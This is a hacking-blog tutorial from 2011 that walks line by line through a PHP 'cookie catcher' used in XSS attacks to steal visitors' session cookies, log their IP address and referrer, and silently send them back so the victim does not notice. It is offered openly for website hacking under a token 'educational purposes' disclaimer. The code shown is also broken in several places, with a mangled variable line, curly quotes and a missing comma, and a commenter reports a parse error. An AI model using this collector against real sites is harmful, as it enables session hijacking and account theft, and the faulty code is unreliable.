Dear Readers: HWS has recently started a new project for the students of engineering ====> The Engineering Projects


Write at HWS !!!

Guest Posting

Monday, November 21, 2011

Splitting the Cookie Catcher Code Line by Line for Understanding


Hello guys , hope you all are fine and enjoying good health. Yesterday I posted about What is Cookie Catcher and How to Get Cookies Using it. It was a simple topic and there's nothing difficult to understand in it and we all know this is used in XSS Attack for the purpose of Website Hacking .Today in this post I am going to split up the code of cookie catcher line by line to make you understand what actually this code is doing.This tutorial is just for understanding the cookie catcher code to develop programming approach in you but if you don't want to go in depth of code then simply skip this topic.

Complete Cookie Catcher Code

  • This is the same code as I have posted in previous tutorial.
<?php
$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Website: '.$referer.'<br><br><br>');
fclose($fp);
header ("javascript:history.back()");
?>

Splitting the Cookie Catcher Code

Now I am going to split the cookie catcher code line by line and giving the description of what this line of code is doing in actual.
<?php
Write the Code Here
?>
  • These two code lines tell the server that the code written inside them is php code.
  • First line is the starting line of code and and the second tells about its end and the code comes within these lines.
$cookie = $_GET['cookie'];
  • This line is the backbone of the Cookie Catcher Code,it gets the cookie from the web browser using php's GET statement
$ip = $_SERVER['REMOTE_ADDR'];
  • REMOTE_ADDR is the user's IP and due to this command we are able to get the ip address of user as well.
$date=date(“j F, Y, g:i a”);
  • Date is well the date the cookie was taken and all the alphabets are actually the variables where the captured date is stored.
$referer=$_SERVER['HTTP_REFERER'];
  • HTTP_REFERER is the site from where the user clicked your script and his cookie are captured.Its actually the same site where you have posted your script.
$fp = fopen('cookies.html' 'a');
  •  This code opens a file named cookies.html on the server where you have uploaded the cookie catcher tool and its the same file where your cookie catcher code will actually come.
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Website: ‘.$referer.’<br><br><br>’);
  • In the previous code ,we opened a file named cookies.html, now we have to write the captured cookies in it so this code actually do this thing.
  • It writes the Cookie ,Date and Time and Website in the opened file cookies.html .
fclose($fp);
  • After writing all the data in cookies.html ,this code finally close the file.
header ("javascript:history.back()");
  • This final line of code sends the user back to the last page fro where he clicked on your link.
  • This code is very useful as victim has no idea that his cookies are captured.
That's all for today and if you want to check where and how to use this Cookie Catcher then read Hack Website Using XSS Attack .
NOTE : You may write your own cookie catcher code if you have the basic knowledge of php and again i am mentioning that this tutorial is totally for educational purposes and team of HWS is not responsible for any kind of misuse of this code.

About the Author

I am XEO Hacker, the founder of Hack With Style (HWS). I am blogging since 2009 before that I just search things and now I am sharing my knowledge through this plateform.I'm also a freelance writer on topics related to Website Hacking,Website Optimization (SEO), blogger customizations and making money online.
In 61 people's circles

Subscribe To Get FREE Tutorials!


Respected Readers:
As a 21 year old student, the only income I rely on is my pocket money. Bearing the running costs of HWS Blog has become really difficult. We educate thousands of bloggers a week with our tutorials. To help us go forward with the same spirit, a small contribution from your side will highly be appreciated.

5 comments:

Parse error: syntax error, unexpected T_STRING in /home/u118064155/public_html/cookie.php on line 4

:,(

cyberphoneways@gmail.com is a big time fake and do not trust them..If u need any proof then send a test mail to johnmatthew.vatican@gmail.com and i will show you the cheating e-mail

There's SHOCKING news in the sports betting industry.

It's been said that any bettor must watch this,

Watch this or stop placing bets on sports...

Sports Cash System - Advanced Sports Betting Software.

BlueHost is ultimately the best web-hosting company for any hosting services you might require.

Confused? Feel free to ask

Your feedback is always appreciated. I will try to reply to your queries as soon as time allows.
Note:-
Please do not spam Spam comments will be deleted immediately upon my review.

Regards,
XEO Hacker

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Recent Posts

Join Me On Facebook

700+ Followers

Followers


meet women in Ukraine contatore visite website counter
DMCA.com

Recent Comments

Follow Me On Twitter

1112+ Followers